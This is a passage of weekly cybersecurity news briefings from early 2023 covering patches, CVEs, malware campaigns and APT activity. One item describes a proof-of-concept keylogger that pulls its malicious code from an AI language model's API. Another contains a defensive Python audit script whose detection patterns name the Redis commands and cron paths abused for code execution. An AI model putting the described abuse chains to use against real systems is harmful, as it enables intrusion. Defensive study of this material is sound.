Security researchers at Wiz have published a paper disclosing two critical vulnerabilities in Alibaba Cloud's PostgreSQL databases. According to the researchers, these flaws allowed unauthorised access to Alibaba Cloud customers' PostgreSQL databases, which could lead to a supply chain attack and remote code execution. It should be noted that the vulnerabilities, named BrokenSesame, were reported to Alibaba Cloud in December 2022; Alibaba deployed mitigations on 12 April, and there is no evidence of exploitation. In short, one flaw would allow privilege escalation in AnalyticDB and the other remote code execution in ApsaraDB RDS. More info → Featured photo: Clark van der Beken / Unsplash
April 21, 2023
Cyber Security
Cyber Security Weekly Briefing, 8 – 14 April
Apple fixes two new actively exploited 0-day vulnerabilities
Apple has released new security advisories about two new actively exploited 0-day vulnerabilities affecting iPhones, Macs and iPads. First, there is the security flaw registered as CVE-2023-28206, an out-of-bounds write in IOSurfaceAccelerator that could trigger data corruption, a crash or code execution. Secondly, the vulnerability assigned as CVE-2023-28205 is a use-after-free in WebKit that could allow data corruption or arbitrary code execution by reusing freed memory through specially crafted malicious web pages controlled by threat actors. Apple recommends updating the software on affected devices to fix the two 0-day vulnerabilities in iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1 and Safari 16.4.1. More info →

* * *

Microsoft Patch Tuesday includes an actively exploited 0-day vulnerability
In its latest security update, Microsoft has fixed a total of 98 vulnerabilities affecting several of its products, including Microsoft Windows, Office and Edge. These include an actively exploited 0-day vulnerability registered as CVE-2023-28252, with a CVSSv3 of 7.8 according to the manufacturer. It is a CLFS flaw that could be exploited locally by malicious actors to obtain SYSTEM privileges. The other critical security flaws, registered as CVE-2023-28311, CVE-2023-21554, CVE-2023-28231, CVE-2023-28219, CVE-2023-28220, CVE-2023-28250 and CVE-2023-28291, should also be mentioned. Finally, CVE-2023-28285, CVE-2023-28295, CVE-2023-28287 and CVE-2023-28311, although less critical than the rest and not being actively exploited, are worth mentioning because they could easily be exploited by opening malicious documents sent in possible future phishing campaigns. More info →

* * *

QuaDream accused of using spyware against political figures and journalists
Researchers from Citizen Lab and Microsoft's Threat Intelligence team have published an investigation into the Israeli company QuaDream, which they accuse of using spyware against journalists and political figures. The company's activity is allegedly based on the sale and distribution of a platform called Reign to government entities, described by Microsoft as a set of exploits, malware and infrastructure designed to exfiltrate information from mobile devices. Among the techniques used to operate it, researchers suspect a zero-click exploit for iOS devices, which they have named ENDOFDAYS, that would make use of invisible iCloud invitations. The analysis has identified at least five victims, who currently remain anonymous, in North America, Central Asia, Southeast Asia, Europe and the Middle East. More info →

* * *

Android security bulletin for April
Android has released its security bulletin for the month of April, fixing a total of 68 vulnerabilities. The most important are two detected in the System component, catalogued as CVE-2023-21085 and CVE-2023-21096, both of critical severity, which could allow an attacker to achieve remote code execution (RCE) without the need for additional execution privileges. In addition, four vulnerabilities in Qualcomm's closed-source components have also been listed as critical: CVE-2022-33231, CVE-2022-33288, CVE-2022-33289 and CVE-2022-33302. Finally, a vulnerability in the Arm Mali GPU kernel driver, CVE-2022-38181 (CVSSv3 8.8), has also been fixed; it is reported to have been actively exploited. More info →

* * *

Azure design flaw allows account takeover
An Orca investigation has exposed a design flaw in Microsoft Azure Shared Key authorisation that would allow an attacker to gain access to Microsoft Storage accounts. Although Orca has published a proof of concept demonstrating how to steal access tokens from higher-privileged identities, move laterally, access critical business assets and achieve remote code execution (RCE), Microsoft's Security Response Center has deemed the issue a design flaw and not a vulnerability, so it will not provide a security update and a fix will have to wait for a redesign in Azure. In the meantime, it is recommended to remove shared key authorisation from Azure storage accounts and instead adopt Azure Active Directory authentication as a mitigation. More info →
April 14, 2023
Cyber Security
Cyber Security Weekly Briefing, 25 – 31 March
GitHub exposes its RSA SSH host key by mistake
GitHub announced last Friday that it had replaced the RSA SSH host key used to protect Git operations. According to the company, this key was accidentally exposed in a public GitHub repository last week. GitHub acted quickly to contain the exposure and launched an investigation to discover the cause and impact. While this key does not give access to GitHub infrastructure or user data, the rotation was carried out to prevent potential spoofing. Users are advised to remove the old key and replace it with the new one. More info →

* * *

Apple fixes an actively exploited 0-day
Apple has released security updates fixing an actively exploited 0-day vulnerability in older iPhone, macOS and iPad devices. The flaw, identified as CVE-2023-23529, is a WebKit type confusion bug with a CVSS of 8.8 that could lead to arbitrary code execution, data theft, access to Bluetooth data, etc. In terms of devices, the vulnerability affects the iPhone 6s, iPhone 7, iPhone SE, iPad Air 2, iPad mini and iPod touch, in addition to Safari 16.3 on macOS Big Sur and Monterey, macOS Ventura, tvOS and watchOS. The company recommends updating as soon as possible to avoid possible exploitation attempts. More info →

* * *

Supply chain attack via 3CX video conferencing platform
Researchers from various security firms such as SentinelOne, Sophos and CrowdStrike have warned of a supply chain attack via the 3CX video conferencing programme. While the investigation into the attack is still ongoing, it has been confirmed to affect Windows platforms, where the compromised 3CXDesktopApp application downloads ICO files from GitHub, ultimately leading to the installation of stealer malware. The first detections of the app's suspicious behaviour by security solutions were reportedly in mid-March 2023, but researchers have identified infrastructure used in the attack with registration dates in February of last year. The campaign, which SentinelOne has dubbed SmoothOperator, has no clear attribution, although some researchers point to possible connections to Labyrinth Chollima, part of the North Korean Lazarus Group. 3CX has not made any statement regarding the campaign. More info →

* * *

Analysis of campaigns exploiting 0-days on Android, iOS and Chrome
Google's Threat Analysis Group has published a report sharing details about two campaigns that used 0-day exploits against Android, iOS and Chrome. In the first campaign, 0-day exploit chains targeting Android and iOS were detected, distributed via shortened links sent by SMS to users located in Italy, Malaysia and Kazakhstan. The iOS vulnerability, already fixed in 2022 and affecting versions prior to 15.1, is identified as CVE-2022-42856 (CVSS 8.8), a type confusion bug in the JIT compiler that can lead to arbitrary code execution. The other, CVE-2021-30900 (CVSS 7.8), also fixed, is an out-of-bounds write and privilege escalation bug. The Android exploit chain targeted users of phones with an ARM GPU running versions earlier than 106. Of the bugs involved, all fixed, one is CVE-2022-3723 (CVSS 8.8), a type confusion in Chrome; CVE-2022-4135 (CVSS 9.6), a buffer overflow in Chrome's GPU; and CVE-2022-38181 (CVSS 8.8), a privilege escalation. It is worth noting that the latter vulnerability was found to be actively exploited. The second campaign, targeting devices in the United Arab Emirates via SMS, consists of several 0-days and n-days targeting Samsung's web browser. The link redirects users to a page developed by spyware vendor Variston and exploits vulnerabilities CVE-2022-4262, CVE-2022-3038, CVE-2022-22706 and CVE-2023-0266. More info →
March 31, 2023
Cyber Security
Cyber Security Weekly Briefing, 18 – 24 March
HinataBot: new botnet dedicated to DDoS attacks
Researchers at Akamai have published a report stating that they have identified a new botnet called HinataBot with the capability to perform DDoS attacks of more than 3.3TB/s. The experts indicate that the malware was discovered in mid-January while being distributed against the company's HTTP and SSH honeypots. HinataBot uses leaked user credentials to infect its victims and exploits old vulnerabilities in Realtek SDK devices (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215), and/or exposed Hadoop YARN servers. Once the devices are infected, the malware executes and waits for the Command & Control server to send commands. Akamai warns that HinataBot is still under development and could implement more exploits, thus expanding its entry vector to more victims and increasing its capability to carry out attacks with a greater impact. More info →

* * *

CISA issues eight security advisories on industrial control systems
CISA has recently issued a total of eight security advisories warning of critical vulnerabilities in industrial control systems. These new vulnerabilities affect several products from different companies such as Siemens, Rockwell Automation, Delta Electronics, VISAM, Hitachi Energy and Keysight Technologies. The most significant are those affecting Siemens, for which three advisories cover its SCALANCE W-700 assets, the RADIUS client of SIPROTEC 5 devices and the RUGGEDCOM APE1808 product family, with a total of 25 vulnerabilities with CVSSv3 scores ranging from 4.1 to 8.2. Also notable for their impact are the advisories for Rockwell Automation's ThinManager ThinServer, one of whose three bugs has a CVSSv3 of 9.8, and for the InfraSuite Device Master product from Delta Electronics, for which a total of 13 vulnerabilities have been reported. More info →

* * *

Mispadu: banking trojan targeting Latin America
Researchers at Metabase Q Team have published a report on an ongoing campaign targeting banking users in Latin American countries using the Mispadu trojan. According to Metabase Q Team, the trojan has been spread through phishing emails carrying fake password-protected invoices in HTML or PDF format. Another strategy involves compromising legitimate websites running vulnerable versions of WordPress to turn them into C2 servers and spread malware from there. According to the research, the campaign started in August 2022 and remains active, affecting banking users mainly in Chile, Mexico and Peru. In November 2019, ESET first documented the existence of Mispadu (also known as URSA), a malware capable of stealing money and credentials, as well as acting as a backdoor, taking screenshots and logging keystrokes. More info →

* * *

New 0-day vulnerabilities against different manufacturers during Pwn2Own contest
The Pwn2Own hacking contest is taking place this week in the Canadian city of Vancouver until Friday 24 March. After the first day, participants have managed to demonstrate compromises of multiple products, including the Windows 11 operating system, Microsoft SharePoint, Ubuntu, VirtualBox, Tesla Gateway and Adobe Reader. It is worth noting that, according to the event's schedule, security researchers will today and tomorrow reveal other 0-days affecting these assets, as well as others such as Microsoft Teams and VMware Workstation. Last but not least, after these new 0-day vulnerabilities are demonstrated and disclosed during Pwn2Own, vendors have 90 days to release security patches for them before the Zero Day Initiative discloses the information publicly. More info →

* * *

Critical vulnerability in WooCommerce Payments fixed
Researcher Michael Mazzolini of GoldNetwork reported a vulnerability in WooCommerce Payments this week, which has resulted in a security update being force-installed. The vulnerability does not yet have a CVE identifier, although it has been assigned a CVSSv3 score of 9.8; it is a privilege escalation and authentication bypass vulnerability that could allow an unauthenticated attacker to impersonate an administrator and take control of the online retailer's website. No active exploitation has been detected so far, although Patchstack has warned that, since no authentication is required for exploitation, it is likely to be seen in the near future. The affected versions range from 4.8.0 to 5.6.1, and the vulnerability has been fixed in version 5.6.2. More info →
March 24, 2023
Cyber Security
Cyber Security Weekly Briefing, 11 – 17 March
A new version of the Xenomorph banking trojan

ThreatFabric researchers have detected a new variant of the Android banking trojan Xenomorph. This malware family was first detected in February 2022 and is attributed to Hadoken Security Group. Xenomorph V3, or Xenomorph.C, as this new variant has been classified, is being distributed via the Zombinder platform on the Google Play store, appearing as a supposed currency converter that downloads an update to an application posing as Google Protect. One of the main new features of this version is the introduction of an ATS (Automated Transfer Systems) framework used to automatically extract credentials, read the account balance, initiate transactions, obtain MFA tokens and finalise fund transfers. It has also added cookie-stealing capabilities. Xenomorph V3 is capable of attacking more than 400 banking and financial institutions, including cryptocurrency wallets, a very significant increase in the pool of potential victims, as its first version only targeted 56 European banks. It should also be noted that Spanish banking institutions are the main targets, followed by those in Turkey, Poland and the United States. Researchers point out that this is one of the most advanced and dangerous trojans in circulation, and that it could become more so as it is likely to start being distributed as MaaS.

More info →

* * *

Microsoft Patch Tuesday includes two actively exploited 0-days

In its latest security update, Microsoft has fixed a total of 83 vulnerabilities affecting several of its products, including Microsoft Windows, Office, Exchange and Azure. Nine of these vulnerabilities received a critical severity score, and another 69 were rated as "important". Among them, two security bugs are 0-days under active exploitation: CVE-2023-23397, a privilege escalation vulnerability in Outlook with a CVSSv3 score of 9.8, and CVE-2023-24880, a security feature bypass vulnerability in Windows SmartScreen with a CVSSv3 score of 5.4. Microsoft has also published a script for CVE-2023-23397. It should be noted that, according to the research, this vulnerability has been exploited as a 0-day since at least April 2022, with fifteen organisations known to have been attacked using it. The vulnerability was discovered by the Ukrainian Computer Emergency Response Team (CERT-UA), which informed Microsoft. An attacker could exploit it by sending a specially crafted email to an Outlook client; the exploit is triggered automatically when Outlook retrieves and processes the message, before it is even displayed in the preview pane, leaking the user's NTLM credentials.

More info →

* * *

YoroTrooper: new threat actor focused on cyber espionage

Researchers at Cisco Talos have detected a new threat actor focused on cyber espionage campaigns. YoroTrooper, as the researchers have named it, has been active since at least June 2022, although it did not come to prominence until February 2023. YoroTrooper campaigns have so far been detected targeting government and energy organisations in Commonwealth of Independent States (CIS) countries, as well as the World Intellectual Property Organisation (WIPO) and a European Union healthcare agency. The entry vector for the attacks is phishing emails with a malicious attachment. YoroTrooper uses several remote access trojans, such as AveMaria/Warzone RAT, LodaRAT and a custom Python implant, as well as stealers such as Stink Stealer, and the Nuitka and PyInstaller frameworks. Telegram is used as C2 for communications between the operators and the installed malware.

More info →

* * *

CISA warns of 0-day exploit in Adobe and urges patch application

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned of 0-day exploitation of vulnerability CVE-2023-26360 in Adobe ColdFusion and has given all government agencies a three-week deadline to apply the patch released on Wednesday by Adobe. Although Adobe's Patch Tuesday stated that the vulnerability had been exploited in a very limited way, CISA raised the alert level by calling patching urgent and mandatory, echoing Charlie Arehart, who discovered the vulnerability and criticised Adobe for the little importance given to it, since it allows the execution of arbitrary code.

More info →

* * *

0-day vulnerabilities in Samsung's Exynos chipsets

Google's security team, Project Zero, has disclosed the existence of 18 0-day vulnerabilities in Samsung's Exynos chipsets, used in mobile devices, laptops and cars. Four of these flaws are the most serious: CVE-2023-24033 and three others that have not yet been assigned a CVE. Their exploitation would allow remote code execution from the Internet to the baseband with no victim interaction, requiring only the victim's phone number. The remaining vulnerabilities, some of them identified as CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075 and CVE-2023-26076, have not been rated as serious, as they require either a malicious mobile network operator or local access to the device. Samsung has issued a security update indicating which devices are affected. In terms of patches, Pixel devices have received a fix for one of the vulnerabilities, while other affected users are advised to disable Wi-Fi calling and Voice-over-LTE calling.

More info →
March 17, 2023
Cyber Security
Cyber Security Weekly Briefing, 4 – 10 March
FBI and CISA launch advisory to combat Royal ransomware

The FBI and CISA launched the #StopRansomware: Royal Ransomware Cybersecurity Advisory on 2 March to help combat this ransomware by disseminating its TTPs and IOCs. Many companies in different critical infrastructure sectors, such as industry, telecommunications, healthcare and education, among others, have been breached with this ransomware variant since September 2022. The FBI and CISA believe that Royal uses its own file encryption software, disabling antivirus when gaining access to a system and leaking data before finally deploying the ransomware. The operators then demand ransoms of between one and eleven million dollars in Bitcoin, and in the note they leave victims a .onion site for contact. Organisations are advised to implement the recommendations and mitigations in the advisory to prevent these attacks.

More info ⇾

* * *

Hiatus: worldwide campaign against business routers

The Lumen Black Lotus Labs team has identified an active campaign targeting business routers. The campaign, which has been named "Hiatus", has been active since July 2022, targeting end-of-life DrayTek Vigor 2960 and 3900 routers with an i386 architecture. The entry vector is currently unknown, but once the router has been compromised, the threat actors deploy a bash script that downloads and executes two malicious binaries: HiatusRAT and a variant of tcpdump for capturing packets. According to the researchers, at least 100 victims have been detected and incorporated into the attackers' botnet, mostly located in Europe, North America and South America. Lumen Black Lotus Labs estimates that the threat actors deliberately kept the campaign at low infection levels in order to avoid attracting attention and evade detection.

More info ⇾

* * *

SYS01stealer: new infostealer targeting critical infrastructures

The research team at Morphisec has published a report on a new infostealer targeting critical government infrastructures, which they have named SYS01stealer. The malicious actors behind this threat specifically target corporate Facebook accounts by using Google ads and fake Facebook profiles that provide download links promoting games, adult content or software but are actually malicious. It is worth noting that once the victim downloads and executes the .zip file, it performs a DLL sideload on the victim's system. Experts point out that SYS01stealer's goal is to steal browser cookies and exploit authenticated Facebook sessions to exfiltrate information from the victim's Facebook account. The malware can also upload files from the infected system to the Command & Control server and execute commands sent by it.

More info ⇾

* * *

PoC of polymorphic malware using Artificial Intelligence

Researchers at Hyas have built a proof-of-concept for polymorphic malware generation using an Artificial Intelligence language model. The software created, which they have named BlackMamba, is a polymorphic keylogger with the ability to modify its code during execution, and without the use of Command & Control (C2) infrastructure. BlackMamba uses a benign executable to communicate with the OpenAI API during execution, which provides it with the malicious code necessary to collect the user's keystrokes. Whenever the malware executes, this capability is re-synthesised, allowing it to evade security solutions. According to the researchers, their analysis with a well-known EDR solution yielded no detection of the malware. In this test, the data collected by the malware is exfiltrated via Microsoft Teams, which it accesses with the stolen credentials.

More info ⇾
March 10, 2023
Cyber Security
Cyber Security Weekly Briefing, 25 February – 3 March
Vulnerabilities in WordPress Houzez

A security researcher from Patchstack has recently discovered two critical vulnerabilities in Houzez, a WordPress theme and plugin that provides easy and seamless listing management for the client. The first vulnerability, identified as CVE-2023-26540 with a CVSS of 9.8, is a configuration bug affecting version 2.7.1 and earlier, and can be exploited remotely without authentication to escalate privileges. The second flaw, identified as CVE-2023-26009 with a CVSS of 9.8, affects the Houzez login component in versions 2.6.3 and earlier. In the attacks observed by Patchstack, the threat actors distributed a backdoor capable of executing commands, injecting ads into the website and redirecting to malicious sites, so researchers recommend updating as soon as possible.

More info →

* * *

Digital Smoke: global investment fraud scam

The Resecurity team has identified an investment fraud ring said to have operated from 2015 to early 2023. The malicious actors behind this network, which has been named "Digital Smoke", operated by impersonating globally known corporations, such as Verizon, BlackRock, Ferrari, Shell and Barclays, among others, to lure victims around the world into fake investment products. Digital Smoke developed a large network of web resources and mobile applications hosted by different hosting providers and in different jurisdictions. The modus operandi consisted of registering domains similar to the legitimate domains of the spoofed companies and placing the links to register new victims on messaging applications such as WhatsApp and other social networks. Once victims registered on the website or application created by the malicious actors, they were asked to make a payment for the alleged investment. It should be noted that investigators shared all available information with the Indian Cybercrime Coordination Centre and US authorities in late 2022, and the operation was discontinued in early 2023.

More info →

* * *

Aruba fixes six critical vulnerabilities

Aruba has issued a security advisory reporting six critical vulnerabilities affecting several versions of ArubaOS. The affected products are Aruba Mobility Conductor, Aruba Mobility Controllers, and WLAN Gateways and SD-WAN Gateways. The vulnerabilities identified as CVE-2023-22747, CVE-2023-22748, CVE-2023-22749 and CVE-2023-22750, all with a CVSSv3 of 9.8, derive from a command injection flaw. CVE-2023-22751 and CVE-2023-22752, also both with a CVSSv3 of 9.8, are buffer overflow bugs. An unauthenticated attacker can exploit these vulnerabilities by sending packets to the PAPI (Aruba Access Point Management Protocol) on UDP port 8211, allowing arbitrary code execution as a privileged user on ArubaOS.

More info →

* * *

APT-C-36: new malicious campaign against Ecuador and Colombia

BlackBerry researchers have published research uncovering a new campaign by APT-C-36, also known as BlindEagle, against geolocated targets in Ecuador and Colombia. In this campaign, malicious actors impersonated Colombia's National Tax and Customs Directorate and Ecuador's Internal Revenue Service in order to launch phishing campaigns targeting key industries in both countries, including the health, financial and governmental sectors. This information follows another discovery in January by Check Point, which warned of a campaign by the same actor that it claimed was motivated by monetary gain. However, BlackBerry has indicated that during the most recent incidents the objectives were to steal information and spy on the victims.

More info →

* * *

Cryptojacking campaign against Redis databases

Researchers at Cado Labs have discovered a cryptojacking campaign targeting misconfigured Redis database servers. The campaign is conducted via transfer.sh, an open source file transfer service that has been breached since 2014. The access vector is the exploitation of an insecure Redis deployment: the database is saved into a cron directory, which leads to the execution of arbitrary commands. Since the malware's main goal is to mine cryptocurrency with XMRig, it takes a number of measures to ensure its effectiveness. Among these, it frees up system memory, removes any competing cryptominers and installs a network scanner to find other vulnerable Redis servers and spread the infection.

More info →
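The misconfiguration chain behind the Redis campaign above (an exposed, unauthenticated instance on which a client can repoint the dump directory at a cron path and save a crafted database there) can be checked for before it is abused. The following is an added example, not Cado Labs' tooling or Redis project code: a redis.conf audit that flags the weak settings and, for contrast, passes a hardened file; the three config snippets are constructed, and the directive names are real redis.conf keys.

```python
"""Audit a redis.conf for the weaknesses abused by the Redis cryptojacking
campaign: Internet-reachable, no authentication, and CONFIG/SAVE available to
any client, so `dir` can be pointed at a cron directory and a dump written there.

Added example for this briefing, not Cado Labs' or Redis code. Directive names
are real redis.conf keys; the three configs below are constructed.
"""
import shlex
from typing import Dict, List

# Directories where a written dump file is picked up by cron (constructed list).
CRON_DIRS = ("/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily", "/var/spool/cron")
# Commands the abuse pattern relies on being reachable by a remote client.
DANGEROUS_COMMANDS = ("CONFIG", "SAVE", "BGSAVE")


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the list of its argument lists (directives may repeat)."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # redis.conf uses shell-like quoting, e.g. ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing weak was found."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # No `bind` directive at all means Redis listens on every interface.
    bind_args = [a for args in conf.get("bind", [["0.0.0.0"]]) for a in args]
    if any(a in ("0.0.0.0", "*", "::") for a in bind_args):
        findings.append("bind: Redis listens on all interfaces")

    protected = conf.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are accepted")

    if "requirepass" not in conf and "user" not in conf:
        findings.append("no requirepass or ACL users: every connecting client is trusted")

    # `rename-command X ""` disables X; anything not disabled is callable remotely.
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) == 2 and args[1] == ""}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in disabled:
            findings.append(f'{cmd} not disabled (use: rename-command {cmd} "")')

    # A persisted `dir` inside a cron path is an indicator the instance was abused.
    for args in conf.get("dir", []):
        if args and any(args[0].startswith(c) for c in CRON_DIRS):
            findings.append(f"dir {args[0]}: dump file would land in a cron directory")
    return findings


WEAK_CONF = """
# constructed: an Internet-exposed instance with defaults loosened
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

TAMPERED_CONF = """
# constructed: what a CONFIG REWRITE would persist after the abuse pattern
bind 0.0.0.0
protected-mode no
dir /var/spool/cron
"""

HARDENED_CONF = """
# constructed: local-only, authenticated, dangerous commands disabled
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
dir /var/lib/redis
dbfilename dump.rdb
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("tampered", TAMPERED_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit_redis_conf(conf) or ["no findings"]:
            print("  -", finding)
```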
March 3, 2023
Cyber Security
Cyber Security Weekly Briefing, 18 – 24 February
Fortinet fixes critical vulnerabilities in FortiNAC and FortiWeb

Fortinet has issued a security advisory fixing two critical vulnerabilities affecting its FortiNAC and FortiWeb products. The first, registered as CVE-2022-39952 with a CVSSv3 of 9.8, affects FortiNAC and could allow an unauthenticated attacker to execute unauthorised code or commands via a specially crafted HTTP request. The other, identified as CVE-2021-42756 with a CVSSv3 of 9.3, affects FortiWeb, and its exploitation could allow an unauthenticated remote attacker to achieve arbitrary code execution via specially crafted HTTP requests. Fortinet recommends that affected users upgrade FortiNAC to versions 9.4.1, 9.2.6, 9.1.8 or 7.2.0, and FortiWeb to versions 7.0.0, 6.3.17, 6.2.7, 6.1.3 or 6.0.8 or later.

More info →

* * *

Access credentials of two major data centre operators exposed

The Resecurity team has published an investigation into the sale of login credentials of two data centre operators in Asia: GDS Holdings Ltd. (China) and ST Telemedia Global Data Centres (Singapore). The security incidents, which have yet to be clarified, took place in 2021, but only became public knowledge on 20 February, when the stolen data was published on an underground forum. The exfiltrated data includes credentials, emails, phone numbers and ID card references, with an estimated compromise of more than 3,000 records in total. Indirectly, large global corporations that used these data centres have also been compromised, with logins of companies such as Apple, BMW, Amazon, Walmart, Alibaba, Microsoft and Ford Motor, among others, being exposed. It should be noted that both data centres forced their customers to change their passwords last January, although Resecurity has confirmed several attempts to access different customer portals. Finally, researchers have also been unable to attribute these attacks to any particular group.

More info →

* * *

Fake ChatGPT applications used to distribute malware

Kaspersky researchers are warning of a fake Windows desktop version of ChatGPT being used to distribute malware. The authors of this campaign, taking advantage of the growing popularity of the OpenAI chatbot, are reportedly using social media accounts to advertise the platform and include a link to the supposed download site. Some of the profiles identified by Kaspersky also offered trial accounts to increase the interest of potential victims. Once the download is complete, an error message is displayed warning of a problem with the installation, while in reality a Trojan with infostealer capabilities, named "Fobo", has been downloaded. Cyble's intelligence team has also investigated the same campaign distributing other malware families, such as the Lumma and Aurora stealers. Security researcher Dominic Alvieri has also published other cases of campaigns distributing the RedLine stealer.

More info →

* * *

Vulnerabilities in VMware products

VMware has issued two security advisories warning of two critical vulnerabilities affecting several of the company's products. The most critical security flaw, CVE-2023-20858, with a CVSSv3 of 9.1 according to the vendor, affects Carbon Black App Control. Exploiting this vulnerability could allow a malicious actor to use a specially crafted entry in the App Control management console to gain access to the server's operating system. The other vulnerability, CVE-2023-20855, with a CVSSv3 of 8.8 according to the vendor, impacts the vRealize Orchestrator, vRealize Automation and Cloud Foundation products. In this case, a malicious actor could use specially crafted input to bypass XML parsing restrictions, resulting in access to sensitive information or privilege escalation on affected systems.

More info →

* * *

Phishing campaign via PayPal

Avanan researchers have reported a new phishing campaign sent from the PayPal platform. The malicious actors are taking advantage of the ease of creating free PayPal accounts, which offer the ability to create and send invoices to multiple recipients at once. In this way, the messages received by the victims come directly from the PayPal domain, bypassing possible security detections. In the detected campaign, several messages have been observed telling victims that their account has been debited and that, if they did not authorise the charge, they should call a telephone number. This phone number is not associated with PayPal, and by calling it the attackers obtain the victims' phone number and other personal details, which can be used in future attacks. Given the difficulty of implementing security measures to block these emails, researchers recommend searching for the phone number on the Internet to check whether or not it is related to PayPal.

More info →
February 24, 2023
Cyber Security
Cyber Security Weekly Briefing, 11 – 17 February
Apple fixes actively exploited 0-day

Apple has issued several security advisories to fix an actively exploited 0-day vulnerability. The security flaw, listed as CVE-2023-23529, is a type confusion in the WebKit browser engine that could be used by an attacker to execute arbitrary code on vulnerable devices after the victim opens a malicious web page crafted for that purpose. The flaw affects both older and newer devices and is fixed in iOS 16.3.1 and iPadOS 16.3.1, macOS Ventura 13.2.1, and Safari 16.3.1. Apple has also fixed a kernel vulnerability that allows remote code execution, registered as CVE-2023-23514, which affected macOS Ventura devices and several iPhone and iPad models. Lastly, a vulnerability that could allow access to unprotected user data, affecting macOS Ventura, has been identified as CVE-2023-23522.

More info →

* * *

Microsoft fixes 75 vulnerabilities in its Patch Tuesday, including 3 0-days

Microsoft has patched 75 vulnerabilities in various products, including Microsoft Windows, Office, Exchange and Azure, in its latest security update. Nine of these vulnerabilities received a critical severity score, and 66 others were rated as "important". Three of these security bugs are 0-days under active exploitation: CVE-2023-21823, a remote code execution vulnerability in Windows Graphics Component with a CVSSv3 score of 7.8; CVE-2023-21715, a security feature bypass vulnerability in Microsoft Publisher with a CVSSv3 score of 7.3; and CVE-2023-23376, a privilege escalation vulnerability in Windows Common Log File System Driver with a CVSSv3 score of 7.8.

More info →

* * *

Cyber-attack against several NATO websites

A NATO official confirmed to the DPA news agency that the organisation was investigating a cyber-attack on several NATO websites. The attack took place on Sunday night and disabled several NATO websites, including that of the NATO Special Operations Headquarters. The attack was allegedly a politically motivated hacktivist action in favour of one of the parties in the current conflict, as a Telegram channel of a hacktivist group posted a message asking fellow hackers for help to attack all NATO units. Other hacktivist channels also posted evidence of inoperable NATO assets, such as the Military Command website and the Joint Military Centre website, among others.

More info →

* * *

Mozilla issues security updates for Firefox 110 and Firefox ESR

Mozilla has issued two security alerts regarding vulnerability fixes in Firefox 110 and Firefox ESR. Most of these vulnerabilities, still pending CVSS classification, have been categorised by the vendor as high impact. Their exploitation could allow an attacker to perform spoofing attacks, access confidential information (including NTLM credentials), evade security mechanisms or execute arbitrary code, among other behaviours. The vendor recommends upgrading to the latest version of Firefox 110 and to Firefox ESR 102.8. The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a notification about these updates, requesting users and administrators to implement the necessary measures.

More info →

* * *

Vulnerabilities in Schneider Electric PLC models

Forescout's Vedere Labs research team has published an analysis of two critical vulnerabilities affecting several Schneider Electric PLC models. The first, registered as CVE-2022-45789 with a CVSSv3 of 9.8, allows an authentication bypass that could lead to the execution of unauthorised Modbus functions on the controller by hijacking an authenticated Modbus session. The second, CVE-2022-45788, also with a CVSSv3 of 9.8, could be exploited for remote code execution or denial of service, and could result in loss of confidentiality and data integrity through the execution of undocumented Modbus UMAS CSA commands. Researchers indicate that malicious actors could chain the two to achieve lateral movement in the victim's network. The affected versions include all versions of EcoStruxure Control Expert and Modicon Unity PLC, as well as EcoStruxure Process Expert version V2020.

More info →

Featured photo: Ed Hardie / Unsplash
February 17, 2023
Cyber Security
Cyber Security Weekly Briefing, 4 – 10 February
Critical vulnerability in Atlassian Jira

Atlassian has issued a security advisory releasing fixes for a critical vulnerability in Jira Service Management Server and Data Center. According to the vendor, the security flaw, registered as CVE-2023-22501 with a CVSSv3 of 9.4, has been classified as low attack complexity because a malicious actor could gain access to registration tokens sent to users with accounts that have never been logged into. This could lead to user impersonation that would allow unauthorised access to critical Jira Service Management instances. Atlassian says the security issue affects versions 5.3.0 to 5.5.0 and advises upgrading to versions 5.3.3, 5.4.2, 5.5.1 or 5.6.0 or later. If the patches cannot be applied immediately, the manufacturer has provided a workaround to manually update the affected asset.

More info ⇾

* * *

Mustang Panda campaign to distribute PlugX

Researchers at EclecticIQ have detected a PlugX malware distribution campaign and attribute it to the APT Mustang Panda. According to the published information, Mustang Panda sent out EU-themed emails containing a supposed Word file that was in fact an LNK-type executable which downloads PlugX onto the victim's system. EclecticIQ states that the target of the campaign is European governmental institutions and recalls that a similar campaign was attributed to the same actor last October, although in the recently detected campaign Mustang Panda has implemented more evasion techniques to avoid detection.

More info ⇾

* * *

Tor and I2P networks hit by DDoS attacks

The Tor and I2P networks have recently been hit by distributed denial-of-service (DDoS) attacks that have caused connectivity and performance problems. Isabela Dias Fernandes, executive director of the Tor Project, issued a statement saying that the network had been under DDoS attacks since July. Neither the target of these ongoing attacks nor the identity of the threat actor behind them has been detailed. The Tor Project has stated that it is continuing to work to improve its defences so that users are not affected. The I2P network has also been the victim of an attack of this type over the last three days, causing performance and connectivity problems. According to statements by the project's administrator, as in the case of Tor, the threat actors behind these attacks are using a variety of tactics to perpetrate the DDoS attacks.

More info ⇾

* * *

New Google Chrome update

